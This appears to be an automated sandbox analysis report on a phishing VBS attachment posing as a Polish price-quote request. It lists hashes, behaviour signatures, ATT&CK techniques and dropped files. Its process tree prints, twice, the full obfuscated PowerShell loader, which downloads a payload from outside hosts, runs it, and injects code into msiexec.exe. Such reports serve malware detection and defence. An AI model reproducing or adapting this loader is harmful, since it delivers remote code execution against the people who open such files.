f1d2e2c963c5f1a6a4a701ede11e8c438d4e4e200111861f63d150a5dd95680d

General

Target

Prośba o wycenę - katalog przykładowy.vbs
Size

156KB
MD5

3655ed4ac8786b349f6c824ef9fbf58c
SHA1

a2c6abe2e04a0c5548288ffdaf4a9c27bc644d0b
SHA256

52bc69a2c50c4bc07047508511fe4e7c17b3f380ac3a6a2f5229330b0b1a6980
SHA512

1792ca76e88342a853ffd6f35cf53956d36178811b411361a5f15499570f02d225c53e83fc4d0b3c85ce1d4009466dc289c0fbeba1984da838110eb9e6519a48
SSDEEP

3072:xiHtveXendAy3yrLRKm+ay3tJuj8Sq2qb0M240PCOLvAtK3qfBHqnSBu46:xiHtveXendAy3yrslay3tJuj8Sq2qb0X

Score

8^/10

discovery

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	3404	powershell.exe
5	2168	msiexec.exe
6	2168	msiexec.exe
8	2168	msiexec.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2168	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2976	powershell.exe
2168	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3452	ping.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3452	ping.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
3404	powershell.exe
3404	powershell.exe
2976	powershell.exe
2976	powershell.exe
2976	powershell.exe
2168	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe
2168	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2976	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1968 wrote to memory of 3452	1968	WScript.exe	82
PID 1968 wrote to memory of 3452	1968	WScript.exe	82
PID 1968 wrote to memory of 3404	1968	WScript.exe	84
PID 1968 wrote to memory of 3404	1968	WScript.exe	84
PID 2976 wrote to memory of 2168	2976	powershell.exe	88
PID 2976 wrote to memory of 2168	2976	powershell.exe	88
PID 2976 wrote to memory of 2168	2976	powershell.exe	88
PID 2976 wrote to memory of 2168	2976	powershell.exe	88

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Prośba o wycenę - katalog przykładowy.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\System32\ping.exe
  ping Horm5zl_6637.6637.6637.657e
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:3452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fiskefartjers Salomonic bullion Kyschtymite Gg Prisaendringer #>;$Vaabenfabrikken='Regier';<#Haemningsloese Euphonized Hertugdmmet Stickler #>;$Perirectitis=$nordpol+$host.UI; function Unglutinousness($Accessarily){If ($Perirectitis) {$Enden++;}$Dunjakke=$Skaansomme+$Accessarily.'Length'-$Enden; for( $Overconservative=4;$Overconservative -lt $Dunjakke;$Overconservative+=5){$Sigillography193=$Overconservative;$Kneppede+=$Accessarily[$Overconservative];$overtrdelsernes='Dyarchic';}$Kneppede;}function Slagvarer($Pigless195){ & ($Tidsplaners) ($Pigless195);}$Udenrigstjenesterne=Unglutinousness ' AppMBrndo attzLindi.alelCounlSpriay ll/Disc ';$Feltlngders=Unglutinousness ' G oTUncrl Gnas ano1Med 2Ps,u ';$Gejlende167='.dbo[RehiNPla e .ilt Opt.DiruSHabieHeinRprosv.angIAndrCMasse fripsco oPunci InjnB.rstOkkuMUdstAHornN Reua W.oGKodiE lsiRDalr] Par:Bact:ForasSteeEPle c AnkUB,nkRC.anIE viTBogsy.esupCoterFaddOTrykTCardOBlodCMoutO FosLHarm=Toop$Ta tfP stE krlPecuTXantLPantnFartgRepod ifeE,nter KaosB gn ';$Udenrigstjenesterne+=Unglutinousness 'Frys5me.n.Unex0Aflo Rep(Mgt W,usriEl,kn igd.obpoPoiswb wes Nat A keNFangTBur, Bisa1Poly0Grun.Tu n0M.lj;satr Ang,WSubtiNeedn Cla6 Tra4Ovic; ,op BurgxFodb6Ring4Skju;Rund Hj r AanvAlb :f es1Dron3 Met1Di r.Cond0Y ge)Sta S usG BeteUnvocNo skspato Rib/karr2Pala0Barn1B.ke0 aas0Klap1 Per0 Re 1S or P.iFPaamiP nnrPippePseufSculo ReaxCobr/An j1Skik3Gu.d1Omfo. Epi0Skum ';$Overconservativedrtsklub=Unglutinousness 'DecouDrejs Ud eKompR Bos-DiscaK.rsgparleDa aNSu,sTbewr ';$Fnomenologis=Unglutinousness 'T.dehSlvft biltFl,ppSa bs Bes:Obj,/Jerk/Ecc bSerrrB aiuHelttOphaa ast.UngipB lelOmo,/SkruIGrapbSk.trUdtru CysgPre t resale ig S feOplslSkuds Baae ,lps ls. Fo ppro c nubxnoni>Rigeh Supt CritLipopH glsW ea: Eng/Undi/FestpForfr AfboDr,bmAmbaeHensn Fartgue.eUnu r Arr.JordrRefisskve/sadoIAraub MarrBesluEnamgTo,ntMa.taRealgAf.veStyllBaktsMiljePed sHalv. Ledp ReacWe exHorn ';$Rancourous=Unglutinousness 'Gear>Dags ';$Tidsplaners=Unglutinousness ' su I Ovee P sxSpac ';$Febrene='Dampningen';$Overconservativenterramal131='\Hylozoist.ony';Slagvarer (Unglutinousness 'Jule$MindgAbsoLFor.OTranBRempAB biL Ile: SalatintnSteaGAllerj ggEHa bbSergsNakev.ollAP ndaSekrB,otiE EtuNStr sReto=Proc$Irrie BrunSystvRens:A stA Fl.Pnon PLased MinADepiTLazaAFina+ M s$ gebOOverVKypeE onorD laCS.nio nsnPhytS abEIndwrS,devMennAIntetUroliGenrVB.rrEUndeNSustT M sEfakuRFilcR onfaWic.m nfaaR itl Ber1 Sky3Prof1Dere ');Slagvarer (Unglutinousness 'Inta$SkrfGAssiL AyaO Eksb intaAfsvLUnve:Ant o eprTA.siARundCRutiUAffaSUnskTReac=Jeal$TurbF KonNF.rso V.nMMisrePokeN UncO sh.L.rimOZeugg,verIPhanS Fe .IdmtSU dep Mo LPiskIAc.uT or(Prfa$.ideRVandADetanDiscc.fsgO M.luSendrR spo Deau PatSFor )I ar ');Slagvarer (Unglutinousness $Gejlende167);$Fnomenologis=$Otacust[0];$Hypogastrium28=(Unglutinousness ' Fej$.illgK.ntL.picoCuraBSansa Real Hei:Bu.tsOrtso elMDiskmmap EDamnr BeagVagnsSurftTraaEQua nphil=H,miNGruneSkaawTe,r-U,fhoIndfbSejrJNerveMisiCUnloTEnem IndSLaryYFgtes tiptPhloePlanM eut. OmsNChrie Kult ila.OdalwL bre,rdlbDoigcCoryl b yIChedeContnRid t,ord ');Slagvarer ($Hypogastrium28);Slagvarer (Unglutinousness 'L ng$ HavS N eoSp rmEnk,mbew eI anrmythgG.ais V ntRnb,e Sidn unp.Aug H .pteNetta ridResteUnmarNeurs pho[verm$GrunO ligv.ankeTyverRundcLangoPlumnNigrsPyr e DudrSt.lvSulaaFyrvtFrysiPumpv brie NoxdSen rRanitSe.gsTappkAquilCarauBianbkaps]E cy= Isl$H,emUQ addSoneeKlavnPlurrPreciGnidgSodasHu htAnstjSvogelegin .ebeAb dsDeretUn,veDur.rPam nVreleReal ');$Herpetolog=Unglutinousness 'Myre$ Su.S msaoLogamFis mJ roeReg rDemigL.gasc.hotLapieustan Int. SysDTel.oU dew rknntilmlAyuboSkroaAnnidDek F,lteiChr,lTegneF,de( rdi$ProtFInt n ilioIn.rmParoeCapsnPrbeo forlTylvohaugg Subi.nissB ad,Fort$GlobAUndefTelef snkaHypotBudgtSesseBespdFooleMedasToed)Sp b ';$Affattedes=$Angrebsvaabens;Slagvarer (Unglutinousness ' im $SpgeGSabbl PsioRemaBLoksaPetrlGlug:MeleNKompoTrimNDialHSyrlyCrosp.aleeTe eRhiorBLogiO ho,LLegaiarbecBlad1 Luc1 Fla0Zany=P.ot(BaxyT FryePe.pSTu iTd ns-SummpPagoaTo dTT llhMayo Le e$ BreAMac FBndeFUngkaCarrT KleTRetseVelgdovereIndesHemo)Indf ');while (!$Nonhyperbolic110) {Slagvarer (Unglutinousness ' Ele$Sterg,glslknaloPa zbpentaNon.l Roe: CorKpistvDesia snedNazerP emaPoron lastKommeChucrKonc=Slov$Kno,tBe gr unau emfeSynk ') ;Slagvarer $Herpetolog;Slagvarer (Unglutinousness ' ros FritNonca Th rVettThauc-OrnasQ adL andeFyldEDreipEc r Udga4balt ');Slagvarer (Unglutinousness '.lum$ A rGStiklFideoDormBDodeALavrlIndm:BoarNPlagOP lyN Unbhdek.y.rappPinnEPrecRL arBPol OTel,LRubrI NetcR de1Wayf1tar,0Z nc=D pe(IlpaTDepoeUddaSGypstSeat-DrejPWorkAOprrT DacHTriv ejen$Afspaf dlfWidoFAm taUnfoTVrditFde eDelpdSp leOutnsTilg) ,nd ') ;Slagvarer (Unglutinousness 'Stam$Ov rGmathL fiOPlatBKl.bAChilLPark: fsAMiliRapicbJakoEOfthJMadedThelSJog pHerrlSkrmiEnemgOverTPietEPeasrNe snstikeFrus=Inds$JennG ,avLPersOPr,mbLampaH rml Lan:Bv eFS mmACrincT lrIVellLOpiniScalTMou.aPatlTOthaoKredRoolaYU.va3Uoev6Spar+ ,dk+ mst% Her$ CypOFolkTSupraDidycH loufuldsGudst .ap.OpkocBarnOLystuAlarnUdgaTCyto ') ;$Fnomenologis=$Otacust[$Arbejdspligterne];}$Anticipators=340909;$arbejdspladsers=30602;Slagvarer (Unglutinousness 'Unde$BageGkirslPrevOAssebAbstaVandlReak:D nusUltrH UdsEA talretstD vaE.abbRPrevdNuclkOverkMycaE CadrSwo eWin sF gb2T ll6Be l sild= ,on NedsgVolueTalwtvase-,oldcsam.oSumpn vertTilserumenP,nktSleg arc$,mbeaBallFka.ofgen aUds T Fo,t NoneUnacD t oEIam sDest ');Slagvarer (Unglutinousness 'slut$fo lgBea.lGraeo G.db Ph aDemolInsu:OutsVL,ceiHuncpAr ep C.eeFortl HanaAmildCine Myrt= Int Inn[EnebSProsyPibesPlagt AlkePropmTe n.Re rCAnstoun enSangv BareInternatut Gen]Anal:Komp: DomFHydrrFuraoDka mGro BLimia orls OtoePrec6Vedd4ske,SLivstMonorSkrhiEndenCupog.uto(Subl$Fav SCorphRabieFrihlunent ngeKor rPetadSaxkk ejlkMin.eGrunr Slve Sygs Sup2Warr6Dela)Sm.t ');Slagvarer (Unglutinousness 'Xylo$ VasgActiLTilso OmkBim aaFriel obb:B.stUByldn,empG uncD Udso VolmSkinM.wagEPostLmagnIPibeg BulE yprOog,EGotc Udhu=V nd Se,i[EkstS SokYAnkeSRegnTDeflES.mhMsvar.sprlt A,he llxAnsatDamo. elE ournBackcIn,oo BevD Subi svin ShoG No ] are: Upb: asyat elsHumaCCo sIIsneiSemi.UndsgB,llELabaTGuldsBogltComprTrapIGenoNAprjg rg(Scum$QuarvU,acIApaypWomaPNon EInkal BubA IntdLege) Arb ');Slagvarer (Unglutinousness 'Bic $Z mogGymnlProfOVartBSkilaPreslOut,: onrMBowsaAgglCKol MJo bOS,teRCoprRSm aiAllesVulc=Nonb$LeanUEminnMategLeptdBereOPrimmJernM,piseDokklSindI HilgpaakePredr KvaEGuan.SlaaS razULateb UdssB,nat PapR RacI ShoNPostG al( Di $A abAGr,nN SkatListiValdc AnoITillPBenzaSndrtS ovoEc erKexsSUnpa,e sl$g unATrapR SambSub.EOddsJGradDRudds lapTokrL HenaOmegdKam.SOr lED,nnrC taSCen )scut ');Slagvarer $Macmorris;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3404

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Fiskefartjers Salomonic bullion Kyschtymite Gg Prisaendringer #>;$Vaabenfabrikken='Regier';<#Haemningsloese Euphonized Hertugdmmet Stickler #>;$Perirectitis=$nordpol+$host.UI; function Unglutinousness($Accessarily){If ($Perirectitis) {$Enden++;}$Dunjakke=$Skaansomme+$Accessarily.'Length'-$Enden; for( $Overconservative=4;$Overconservative -lt $Dunjakke;$Overconservative+=5){$Sigillography193=$Overconservative;$Kneppede+=$Accessarily[$Overconservative];$overtrdelsernes='Dyarchic';}$Kneppede;}function Slagvarer($Pigless195){ & ($Tidsplaners) ($Pigless195);}$Udenrigstjenesterne=Unglutinousness ' AppMBrndo attzLindi.alelCounlSpriay ll/Disc ';$Feltlngders=Unglutinousness ' G oTUncrl Gnas ano1Med 2Ps,u ';$Gejlende167='.dbo[RehiNPla e .ilt Opt.DiruSHabieHeinRprosv.angIAndrCMasse fripsco oPunci InjnB.rstOkkuMUdstAHornN Reua W.oGKodiE lsiRDalr] Par:Bact:ForasSteeEPle c AnkUB,nkRC.anIE viTBogsy.esupCoterFaddOTrykTCardOBlodCMoutO FosLHarm=Toop$Ta tfP stE krlPecuTXantLPantnFartgRepod ifeE,nter KaosB gn ';$Udenrigstjenesterne+=Unglutinousness 'Frys5me.n.Unex0Aflo Rep(Mgt W,usriEl,kn igd.obpoPoiswb wes Nat A keNFangTBur, Bisa1Poly0Grun.Tu n0M.lj;satr Ang,WSubtiNeedn Cla6 Tra4Ovic; ,op BurgxFodb6Ring4Skju;Rund Hj r AanvAlb :f es1Dron3 Met1Di r.Cond0Y ge)Sta S usG BeteUnvocNo skspato Rib/karr2Pala0Barn1B.ke0 aas0Klap1 Per0 Re 1S or P.iFPaamiP nnrPippePseufSculo ReaxCobr/An j1Skik3Gu.d1Omfo. Epi0Skum ';$Overconservativedrtsklub=Unglutinousness 'DecouDrejs Ud eKompR Bos-DiscaK.rsgparleDa aNSu,sTbewr ';$Fnomenologis=Unglutinousness 'T.dehSlvft biltFl,ppSa bs Bes:Obj,/Jerk/Ecc bSerrrB aiuHelttOphaa ast.UngipB lelOmo,/SkruIGrapbSk.trUdtru CysgPre t resale ig S feOplslSkuds Baae ,lps ls. Fo ppro c nubxnoni>Rigeh Supt CritLipopH glsW ea: Eng/Undi/FestpForfr AfboDr,bmAmbaeHensn Fartgue.eUnu r Arr.JordrRefisskve/sadoIAraub MarrBesluEnamgTo,ntMa.taRealgAf.veStyllBaktsMiljePed sHalv. Ledp ReacWe exHorn ';$Rancourous=Unglutinousness 'Gear>Dags ';$Tidsplaners=Unglutinousness ' su I Ovee P sxSpac ';$Febrene='Dampningen';$Overconservativenterramal131='\Hylozoist.ony';Slagvarer (Unglutinousness 'Jule$MindgAbsoLFor.OTranBRempAB biL Ile: SalatintnSteaGAllerj ggEHa bbSergsNakev.ollAP ndaSekrB,otiE EtuNStr sReto=Proc$Irrie BrunSystvRens:A stA Fl.Pnon PLased MinADepiTLazaAFina+ M s$ gebOOverVKypeE onorD laCS.nio nsnPhytS abEIndwrS,devMennAIntetUroliGenrVB.rrEUndeNSustT M sEfakuRFilcR onfaWic.m nfaaR itl Ber1 Sky3Prof1Dere ');Slagvarer (Unglutinousness 'Inta$SkrfGAssiL AyaO Eksb intaAfsvLUnve:Ant o eprTA.siARundCRutiUAffaSUnskTReac=Jeal$TurbF KonNF.rso V.nMMisrePokeN UncO sh.L.rimOZeugg,verIPhanS Fe .IdmtSU dep Mo LPiskIAc.uT or(Prfa$.ideRVandADetanDiscc.fsgO M.luSendrR spo Deau PatSFor )I ar ');Slagvarer (Unglutinousness $Gejlende167);$Fnomenologis=$Otacust[0];$Hypogastrium28=(Unglutinousness ' Fej$.illgK.ntL.picoCuraBSansa Real Hei:Bu.tsOrtso elMDiskmmap EDamnr BeagVagnsSurftTraaEQua nphil=H,miNGruneSkaawTe,r-U,fhoIndfbSejrJNerveMisiCUnloTEnem IndSLaryYFgtes tiptPhloePlanM eut. OmsNChrie Kult ila.OdalwL bre,rdlbDoigcCoryl b yIChedeContnRid t,ord ');Slagvarer ($Hypogastrium28);Slagvarer (Unglutinousness 'L ng$ HavS N eoSp rmEnk,mbew eI anrmythgG.ais V ntRnb,e Sidn unp.Aug H .pteNetta ridResteUnmarNeurs pho[verm$GrunO ligv.ankeTyverRundcLangoPlumnNigrsPyr e DudrSt.lvSulaaFyrvtFrysiPumpv brie NoxdSen rRanitSe.gsTappkAquilCarauBianbkaps]E cy= Isl$H,emUQ addSoneeKlavnPlurrPreciGnidgSodasHu htAnstjSvogelegin .ebeAb dsDeretUn,veDur.rPam nVreleReal ');$Herpetolog=Unglutinousness 'Myre$ Su.S msaoLogamFis mJ roeReg rDemigL.gasc.hotLapieustan Int. SysDTel.oU dew rknntilmlAyuboSkroaAnnidDek F,lteiChr,lTegneF,de( rdi$ProtFInt n ilioIn.rmParoeCapsnPrbeo forlTylvohaugg Subi.nissB ad,Fort$GlobAUndefTelef snkaHypotBudgtSesseBespdFooleMedasToed)Sp b ';$Affattedes=$Angrebsvaabens;Slagvarer (Unglutinousness ' im $SpgeGSabbl PsioRemaBLoksaPetrlGlug:MeleNKompoTrimNDialHSyrlyCrosp.aleeTe eRhiorBLogiO ho,LLegaiarbecBlad1 Luc1 Fla0Zany=P.ot(BaxyT FryePe.pSTu iTd ns-SummpPagoaTo dTT llhMayo Le e$ BreAMac FBndeFUngkaCarrT KleTRetseVelgdovereIndesHemo)Indf ');while (!$Nonhyperbolic110) {Slagvarer (Unglutinousness ' Ele$Sterg,glslknaloPa zbpentaNon.l Roe: CorKpistvDesia snedNazerP emaPoron lastKommeChucrKonc=Slov$Kno,tBe gr unau emfeSynk ') ;Slagvarer $Herpetolog;Slagvarer (Unglutinousness ' ros FritNonca Th rVettThauc-OrnasQ adL andeFyldEDreipEc r Udga4balt ');Slagvarer (Unglutinousness '.lum$ A rGStiklFideoDormBDodeALavrlIndm:BoarNPlagOP lyN Unbhdek.y.rappPinnEPrecRL arBPol OTel,LRubrI NetcR de1Wayf1tar,0Z nc=D pe(IlpaTDepoeUddaSGypstSeat-DrejPWorkAOprrT DacHTriv ejen$Afspaf dlfWidoFAm taUnfoTVrditFde eDelpdSp leOutnsTilg) ,nd ') ;Slagvarer (Unglutinousness 'Stam$Ov rGmathL fiOPlatBKl.bAChilLPark: fsAMiliRapicbJakoEOfthJMadedThelSJog pHerrlSkrmiEnemgOverTPietEPeasrNe snstikeFrus=Inds$JennG ,avLPersOPr,mbLampaH rml Lan:Bv eFS mmACrincT lrIVellLOpiniScalTMou.aPatlTOthaoKredRoolaYU.va3Uoev6Spar+ ,dk+ mst% Her$ CypOFolkTSupraDidycH loufuldsGudst .ap.OpkocBarnOLystuAlarnUdgaTCyto ') ;$Fnomenologis=$Otacust[$Arbejdspligterne];}$Anticipators=340909;$arbejdspladsers=30602;Slagvarer (Unglutinousness 'Unde$BageGkirslPrevOAssebAbstaVandlReak:D nusUltrH UdsEA talretstD vaE.abbRPrevdNuclkOverkMycaE CadrSwo eWin sF gb2T ll6Be l sild= ,on NedsgVolueTalwtvase-,oldcsam.oSumpn vertTilserumenP,nktSleg arc$,mbeaBallFka.ofgen aUds T Fo,t NoneUnacD t oEIam sDest ');Slagvarer (Unglutinousness 'slut$fo lgBea.lGraeo G.db Ph aDemolInsu:OutsVL,ceiHuncpAr ep C.eeFortl HanaAmildCine Myrt= Int Inn[EnebSProsyPibesPlagt AlkePropmTe n.Re rCAnstoun enSangv BareInternatut Gen]Anal:Komp: DomFHydrrFuraoDka mGro BLimia orls OtoePrec6Vedd4ske,SLivstMonorSkrhiEndenCupog.uto(Subl$Fav SCorphRabieFrihlunent ngeKor rPetadSaxkk ejlkMin.eGrunr Slve Sygs Sup2Warr6Dela)Sm.t ');Slagvarer (Unglutinousness 'Xylo$ VasgActiLTilso OmkBim aaFriel obb:B.stUByldn,empG uncD Udso VolmSkinM.wagEPostLmagnIPibeg BulE yprOog,EGotc Udhu=V nd Se,i[EkstS SokYAnkeSRegnTDeflES.mhMsvar.sprlt A,he llxAnsatDamo. elE ournBackcIn,oo BevD Subi svin ShoG No ] are: Upb: asyat elsHumaCCo sIIsneiSemi.UndsgB,llELabaTGuldsBogltComprTrapIGenoNAprjg rg(Scum$QuarvU,acIApaypWomaPNon EInkal BubA IntdLege) Arb ');Slagvarer (Unglutinousness 'Bic $Z mogGymnlProfOVartBSkilaPreslOut,: onrMBowsaAgglCKol MJo bOS,teRCoprRSm aiAllesVulc=Nonb$LeanUEminnMategLeptdBereOPrimmJernM,piseDokklSindI HilgpaakePredr KvaEGuan.SlaaS razULateb UdssB,nat PapR RacI ShoNPostG al( Di $A abAGr,nN SkatListiValdc AnoITillPBenzaSndrtS ovoEc erKexsSUnpa,e sl$g unATrapR SambSub.EOddsJGradDRudds lapTokrL HenaOmegdKam.SOr lED,nnrC taSCen )scut ');Slagvarer $Macmorris;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2976
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ee1e607b6315eac895db6209069dceb6

SHA1
9c36204f7011c96e6a0bcc10d1fc1deddc00ff5e

SHA256
7113815f01d20c8d2fa86a3b15dc253895250ae7b76b9a9cc317b4e9f351d09f

SHA512
692676c2f18ccd0e5195d91ec4d952b447358256bc39a17697b6ffb0468bd5c1a2bf0281af914cb1e327f95e38532d18a3083e05ca64d529978b7a993b16ceb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uc2vj5dc.34c.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Hylozoist.ony

Filesize
483KB

MD5
2730ea300dd8f8a61c62aa15dbae95ec

SHA1
81135e9e6be89fa71c26cea562db481d0e19e955

SHA256
fb9a4010024a0621a1aa44aeb5de465e20ddd34272cfc9010d451064ffc83f03

SHA512
62e21216a80d1f2a6227d968503370d020056f6d26b26c3e95225d6c64891889f849f7541e36da86c89daf215fde8220ffcd232d21cf5051a586ee0b06a21435

Download Submit
memory/2168-55-0x0000000000E70000-0x0000000002187000-memory.dmp

Filesize
19.1MB

Download
memory/2168-52-0x0000000000E70000-0x0000000002187000-memory.dmp

Filesize
19.1MB

Download
memory/2168-51-0x0000000000E70000-0x0000000002187000-memory.dmp

Filesize
19.1MB

Download
memory/2168-50-0x0000000000E70000-0x0000000002187000-memory.dmp

Filesize
19.1MB

Download
memory/2168-49-0x0000000000E70000-0x0000000002187000-memory.dmp

Filesize
19.1MB

Download
memory/2976-18-0x00000000031C0000-0x00000000031F6000-memory.dmp

Filesize
216KB

Download
memory/2976-36-0x0000000006F20000-0x0000000006F3A000-memory.dmp

Filesize
104KB

Download
memory/2976-21-0x0000000006280000-0x00000000062E6000-memory.dmp

Filesize
408KB

Download
memory/2976-22-0x00000000062F0000-0x0000000006356000-memory.dmp

Filesize
408KB

Download
memory/2976-31-0x0000000006420000-0x0000000006777000-memory.dmp

Filesize
3.3MB

Download
memory/2976-19-0x0000000005C50000-0x000000000627A000-memory.dmp

Filesize
6.2MB

Download
memory/2976-33-0x0000000006940000-0x000000000695E000-memory.dmp

Filesize
120KB

Download
memory/2976-34-0x0000000006970000-0x00000000069BC000-memory.dmp

Filesize
304KB

Download
memory/2976-35-0x0000000007F90000-0x000000000860A000-memory.dmp

Filesize
6.5MB

Download
memory/2976-20-0x0000000005A80000-0x0000000005AA2000-memory.dmp

Filesize
136KB

Download
memory/2976-37-0x0000000007A20000-0x0000000007AB6000-memory.dmp

Filesize
600KB

Download
memory/2976-38-0x0000000007980000-0x00000000079A2000-memory.dmp

Filesize
136KB

Download
memory/2976-39-0x0000000008BC0000-0x0000000009166000-memory.dmp

Filesize
5.6MB

Download
memory/2976-41-0x0000000009170000-0x000000000DCB1000-memory.dmp

Filesize
75.3MB

Download
memory/3404-0-0x00007FF9F7FA3000-0x00007FF9F7FA5000-memory.dmp

Filesize
8KB

Download
memory/3404-17-0x00007FF9F7FA0000-0x00007FF9F8A62000-memory.dmp

Filesize
10.8MB

Download
memory/3404-12-0x00007FF9F7FA0000-0x00007FF9F8A62000-memory.dmp

Filesize
10.8MB

Download
memory/3404-11-0x00007FF9F7FA0000-0x00007FF9F8A62000-memory.dmp

Filesize
10.8MB

Download
memory/3404-10-0x00007FF9F7FA0000-0x00007FF9F8A62000-memory.dmp

Filesize
10.8MB

Download
memory/3404-1-0x000001E1AFCF0000-0x000001E1AFD12000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads